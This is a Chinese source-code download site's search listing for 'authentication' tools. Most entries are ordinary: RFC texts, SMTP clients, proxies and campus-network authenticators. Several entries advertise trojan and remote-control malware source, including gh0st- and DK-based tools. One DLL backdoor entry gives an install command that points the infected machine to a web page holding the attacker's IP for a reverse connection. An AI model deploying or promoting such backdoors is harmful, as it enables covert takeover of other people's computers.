CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 Internet/网络编程 搜索资源 - authentication

搜索资源列表

  1. RFC2617_HTTPAuthentication

    0下载:
  2. RFC2617_HTTP “HTTP/1.0”中包括基本访问鉴别方案(Basic Access Authentication scheme)本文档还提供了HTTP鉴别框架的规范,有关原始的基本鉴别方案和基于哈希加密的方案的内容
  3. 所属分类:Internet/网络编程

    • 发布日期:2008-10-13
    • 文件大小:261665
    • 提供者:zhang
  1. tinysendsmtp

    0下载:
  2. 一个基于MFC对话框结构的Mail发送客户端程序,该Mail客户端可以发送附件,支持SMTP服务器身份验证,BASE64编码。该程序用MFC的CSocket类开发,作者自己写了一个CSMTP类来进行各种处理。注意,应用的实现部分在一个DLL中处理。(感谢我的朋友jplou)-an MFC dialog based on the structure of the Mail this client, the Mail client can send attachments, support SMTP
  3. 所属分类:Email客户端

    • 发布日期:2008-10-13
    • 文件大小:109473
    • 提供者:乐浩军
  1. burpproxy_v1.22

    0下载:
  2. Burp 是一个运行在linux下的交互式的HTTP/S代理服务器。它可以用来跟踪Web应用程序。它工作在终端浏览器和Web服务器之间,容许截取、观测和编辑网络传输包。它同时支持多个代理服务器和认证模式。-Burp is a run on the Linux interactive HTTP / S proxy server. It can be used to track Web applications. Its work in the terminal browser and Web se
  3. 所属分类:代理服务器

    • 发布日期:2008-10-13
    • 文件大小:114858
    • 提供者:龙柏利
  1. 2221485

    0下载:
  2. 经常在论坛看到网友提问如何发送电子邮件(SMTP服务器认证),其实只要知道客户端与邮件服务器之间会话,用户 名和密码是通过base64编码加密后传送,问题就很容易被解决.协议使用方面和smtp协议使用是一模一样的,值得 注意的就是esmtp协议在用户名和密码验证时,服务器返回一个354的消息代号.本代码没有针对错误提示信息处理, 但保证能正常发送邮件,大家可以自己完善它,本代码还使用IME编码,这样就可以发送超文本电子邮件了。用过 Foxmail4.1朋友应该知道,它实现的图文并茂声音邮件是它的
  3. 所属分类:WEB邮件程序

    • 发布日期:2008-10-13
    • 文件大小:26073
    • 提供者:wj
  1. ISAPI Filter 限制 IIS 多线程访问

    0下载:
  2. 使用 ISAPI Filter 实现的限制 IIS 多线程访问程序。 主要应用在下载系统,或者使用 IIS 做的流媒体点播系统中,稍加修改可以使其具有认证功能。在程序中已经对 用户认证 事件做了直接返回的处理。 使用本 Filter 可以很容易的获得服务器的连接数,从而可以实现多个服务器的负载平衡(可以把请求分发到连接较少的一个服务器上)。 可以对访问的有效控制,可以自定义无限制用户IP,限制用户的IP。 从而可以实现对某个IP的限制数不限制,或者对某个IP的封杀。-use ISAPI Filt
  3. 所属分类:Web服务器

    • 发布日期:2008-10-13
    • 文件大小:95052
    • 提供者:zero
  1. 050615adminchick-backdoor

    1下载:
  2. 注入进程的 超强DLL后门木马 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须
  3. 所属分类:远程控制编程

    • 发布日期:2008-10-13
    • 文件大小:110566
    • 提供者:aaaa
  1. autharp.tar

    0下载:
  2. 针对ARP协议的安全漏洞以及它所造成的网络安全问题,使用了一种对ARP的数据包进行认证的机制-against ARP security holes and the resulting network security, the use of a pair of ARP packets of data authentication mechanism
  3. 所属分类:防火墙与安全工具

    • 发布日期:2008-10-13
    • 文件大小:24013
    • 提供者:李婧
  1. mystarV0.11-src.tar.gz

    0下载:
  2. 本源码收集自网络,实现校园ruijie的认证。希望提供于此,便于各位大侠改进。,Collected from this source network authentication ruijie campus. Wish to provide this for you heroes to improve.
  3. 所属分类:TCP/IP Stack

    • 发布日期:2017-03-28
    • 文件大小:16347
    • 提供者:tbam
  1. httptunnel-ntlm.rar

    0下载:
  2. 这是一个C++版本的httptunnel代码,支持NTLM密码验证,支持SSL,可以建立多个通道,在最新版本的cygwin下用GCC编译通过,This is a C++ Version httptunnel code, support for NTLM Password Authentication to support SSL, can create multiple channels, in the latest version of cygwin using GCC compiler th
  3. 所属分类:Proxy Server

    • 发布日期:2017-04-10
    • 文件大小:1331200
    • 提供者:demon
  1. WLYZ-VC-ASP

    1下载:
  2. 这个也是一个网络验证系统,VC+ASP源码,有需要可以测试使用,功能很强!-This is a network authentication system, VC+ ASP source code, there is a need to test the use, features strong!
  3. 所属分类:网络截获/分析

    • 发布日期:2012-11-19
    • 文件大小:172352
    • 提供者:忠哲
  1. PlugInStruts

    0下载:
  2. 在structs中添加插件做验证(一部分人认为写逻辑麻烦所以将验证放到XML中去执行)-Add plug-in structs do authentication (some people think that writing logic into trouble it will validate the XML to perform)
  3. 所属分类:Browser Plugins

    • 发布日期:2017-03-31
    • 文件大小:295243
    • 提供者:415382750
  1. err-006

    0下载:
  2. DK是一款很好的小木马远控这里是他的源码,还附带了本地验证和网络验证源码,请大家使用啊!-A very good small Trojan horse remote control source, there is also a local authentication and network authentication source code, please use!
  3. 所属分类:Remote Control

    • 发布日期:2017-05-20
    • 文件大小:5671268
    • 提供者:yejiancheng
  1. RFC2617-cn.zip

    0下载:
  2. RFC2617中文版,描述了HTTP digest认证过程算法,并有一个具体例子。,Chinese version of RFC2617 describes the process of HTTP digest authentication algorithm, and there is a specific example.
  3. 所属分类:Internet-Socket-Network

    • 发布日期:2016-01-27
    • 文件大小:283392
    • 提供者:yaopeng
  1. HPScktSrvr-IPv6

    0下载:
  2. High performance socket server based on Windows Completion Port and with using Windows Socket Extensions. IPv6 supported. Version 1.4. Included two demo: 1) Simple HTTP server what can work in HTTP and HTTP over SSL mode (HTTPS). SSL mode ba
  3. 所属分类:WinSock-NDIS

    • 发布日期:2017-04-02
    • 文件大小:77778
    • 提供者:
  1. smtp

    0下载:
  2. 一个用C++编写的邮件发送程序,带SMTP验证,能添加附件-One with C++ Prepared e-mail program, with SMTP authentication, to add the annex
  3. 所属分类:WEB Mail

    • 发布日期:2017-03-26
    • 文件大小:75995
    • 提供者:张俭
  1. NG20100405(gh0st)

    0下载:
  2. 饭客金牌源码,里面附有网络验证,功能强大,界面好-Food source off the gold medal, which with network authentication, powerful, better interface
  3. 所属分类:Remote Control

    • 发布日期:2017-04-09
    • 文件大小:1819851
    • 提供者:林好
  1. sendmail

    0下载:
  2. 用c++写的,后台定时发送邮件,通过SMTP协议, 可以带附件。通过163、126邮件试验,完全能够发送。支持SMTP服务器对用户认证。-Using c++ written Backgrounds regularly send mail through SMTP protocol, you can belt attachment. 163,126 e-mail through the test, fully capable of delivering. Supported SMTP serv
  3. 所属分类:Email Client

    • 发布日期:2017-03-30
    • 文件大小:37216
    • 提供者:李峰
  1. V8.0-vc

    0下载:
  2. Vs2008网络验证编写,网络验证,网络-The Vs2008 network authentication write, network authentication, network
  3. 所属分类:Grid Computing

    • 发布日期:2017-03-29
    • 文件大小:117669
    • 提供者:刘强
  1. 081012084108

    0下载:
  2. 苹果下的锐捷认证软件(有源代码).本程序完成Mac OS X下校园网的锐捷认证,算法是锐捷2.56。 power PC version 测试环境(PowerPC G4, Leopard 10.5.2) verion 1.0 beta-Czech Republic under the Apple authentication sharp software (source code). This process is complete Mac OS X under the campus ne
  3. 所属分类:WinSock-NDIS

    • 发布日期:2017-04-05
    • 文件大小:110317
    • 提供者:mao
  1. freecap_3.18-src

    0下载:
  2. 1. 支持socks5, socks4/socks4a, http tunel 的代理调度功能 (SocksCap只支持对socks代理的调度) 2. 支持多级代理链(例如 SOCKSv4 -> HTTP -> SOCKSv4 -> SOCKSv5) 3. 遵守RFC 1928, 1929, 2817协议,也就是说支持代理身份验证 4. DNS远程解析 5. 通过多级代理链进行一层层的DNS解析 -1. Support for socks5, socks4
  3. 所属分类:Internet-Socket-Network

    • 发布日期:2017-05-20
    • 文件大小:5894265
    • 提供者:郝雪松
« 1 2 34 5 6 7 8 9 10 ... 19 »
搜珍网 www.dssz.com